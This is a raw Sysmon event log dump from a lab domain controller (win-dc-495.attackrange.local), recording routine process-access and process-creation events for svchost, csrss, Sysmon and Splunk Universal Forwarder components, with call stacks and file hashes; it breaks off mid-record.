10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.615{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.161{59A5CD1D-8FA4-6005-FE00-00000000A301}32401132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.021{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 